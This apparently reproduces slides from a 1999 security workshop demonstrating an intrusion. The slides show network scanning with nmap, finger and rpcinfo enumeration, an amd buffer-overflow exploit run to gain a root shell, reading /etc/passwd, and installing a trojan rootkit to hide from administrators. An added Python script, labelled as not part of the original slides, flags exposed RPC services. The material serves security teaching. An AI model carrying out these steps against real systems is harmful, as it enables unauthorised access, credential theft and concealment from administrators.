Intrusion demonstration Part I

Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015) [email protected]


Page 1: Intrusion demonstration Part I

Postech PLUS

Taeho Oh (PLUS015)

[email protected]

Page 2: Intrusion demonstration Part I

Contents

• Scan wide area network
  – Using powerful network scanner, nmap
  – Find the running hosts in the network
  – Gather the host information

• Get root permission from the target host

• Hide himself from the admin

Page 3: Intrusion demonstration Part I

Scan wide area network (1)

• Using powerful network scanner, nmap
  – nmap can do ftp bounce scan, stealth scan, OS prediction, and so on.
  – http://www.insecure.org/nmap

Page 4: Intrusion demonstration Part I

Scan wide area network (2)

• Find the running hosts in the network

    [ root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*"
    Host (141.223.xxx.0) appears to be up.
    Host (141.223.xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host.
    Host kwxnxoo.postech.ac.kr (141.223.xxx.7) appears to be up.
    Host xojx.postech.ac.kr (141.223.xxx.9) appears to be up.
    ( . . . )
    Host victim.postech.ac.kr (141.223.xxx.75) appears to be up.
    Host xstxos.postech.ac.kr (141.223.xxx.77) appears to be up.
    Host anxelx.postech.ac.kr (141.223.xxx.78) appears to be up.
    Host mxrlxns.postech.ac.kr (141.223.xxx.79) appears to be up.
    Host (141.223.xxx.99) appears to be up.
    Host (141.223.xxx.255) appears to be up.
    Host (141.223.xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host.
    Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2 seconds

Page 5: Intrusion demonstration Part I

Scan wide area network (3)

• Gather the host information

    [ root@ohhara ~ ] {2} # nmap -I -O 141.223.121.75
    Interesting ports on victim.postech.ac.kr (141.223.xxx.75):
    Port    State   Protocol  Service  Owner
    21      open    tcp       ftp      root
    23      open    tcp       telnet   root
    25      open    tcp       smtp     root
    53      open    tcp       domain   root
    79      open    tcp       finger   root
    80      open    tcp       http     nobody
    ( . . . )
    6000    open    tcp       X11      root

    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=2098031 (Good luck!)
    Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2
    Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds

Page 6: Intrusion demonstration Part I

Scan wide area network (4)

• Gather the host information

    [ root@ohhara ~ ] {3} # finger @141.223.xxx.75
    [141.223.xxx.75]
    Login     Name            Tty  Idle  Login Time    Office  Office Phone
    kotaeji   Kim Taehyung    /0   20:46 Oct 27 19:41
    [ root@ohhara ~ ] {4} # rpcinfo -p 141.223.xxx.75
       program vers proto   port
        100000    2   tcp    111  rpcbind
        100000    2   udp    111  rpcbind
    ( . . . )
        100021    1   udp   1026  nlockmgr
        100021    3   udp   1026  nlockmgr
        100021    1   tcp   1024  nlockmgr
        100021    3   tcp   1024  nlockmgr
        300019    1   tcp    878  amd
        300019    1   udp    879  amd
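As an added example (not part of the original slides), a small Python audit script that parses rpcinfo -p output like the listing above and flags RPC programs an administrator should review; the sample listing is reconstructed from the slide, and every watchlist entry other than amd (program 300019, the service the next slide shows being exploited) is an assumption for this example.

```python
import re
from collections import namedtuple

RpcService = namedtuple("RpcService", "program version proto port name")

# Constructed sample: the slide's rpcinfo -p listing, one record per line.
SAMPLE_RPCINFO = """\
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
( . . . )
    100021    1   udp   1026  nlockmgr
    100021    3   udp   1026  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    878  amd
    300019    1   udp    879  amd
"""

# RPC program numbers to flag. 300019 (amd) is the one the slides show
# being attacked; mountd and nfs are assumed additions for this example.
WATCHLIST = {
    300019: "amd automounter; slide 7 shows a remote root overflow against it",
    100005: "mountd (assumed watchlist entry)",
    100003: "nfs (assumed watchlist entry)",
}

# One rpcinfo -p record: program, version, proto, port, optional service name.
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")


def parse_rpcinfo(text):
    """Return RpcService records; header and '( . . . )' lines are skipped."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        prog, vers, proto, port, name = m.groups()
        services.append(RpcService(int(prog), int(vers), proto, int(port), name or ""))
    return services


def flag_exposed(services, watchlist=WATCHLIST):
    """List every registered program/port that appears on the watchlist."""
    return [f"{s.name or s.program} v{s.version} on {s.proto}/{s.port}: {watchlist[s.program]}"
            for s in services if s.program in watchlist]


if __name__ == "__main__":
    for finding in flag_exposed(parse_rpcinfo(SAMPLE_RPCINFO)):
        print("REVIEW:", finding)
```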

Page 7: Intrusion demonstration Part I

Get root permission from the target host

• Get root with amd buffer overflow exploit

    [ root@ohhara ~ ] {5} # ./amd-ex 141.223.xxx.75
    Attack 141.223.xxx.75
    amq: could not start new autmount point: Connection timed out
    Connect to the shell
    Linux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown
    uid=0(root) gid=0(root)
    id
    uid=0(root) gid=0(root)
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2:daemon:/sbin:
    adm:x:3:4:adm:/var/adm:
    lp:x:4:7:lp:/var/spool/lpd:
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    ( . . . )

Page 8: Intrusion demonstration Part I

Hide himself from the admin

• Install rootkit

• Trojan files of ohhara rootkit
  – chgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so

    [ root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz
    [ root@victim ~ ] {2} # cd ohhara-rootkit
    [ root@victim ~/ohhara-rootkit ] {3} # ./install-ohhara-rootkit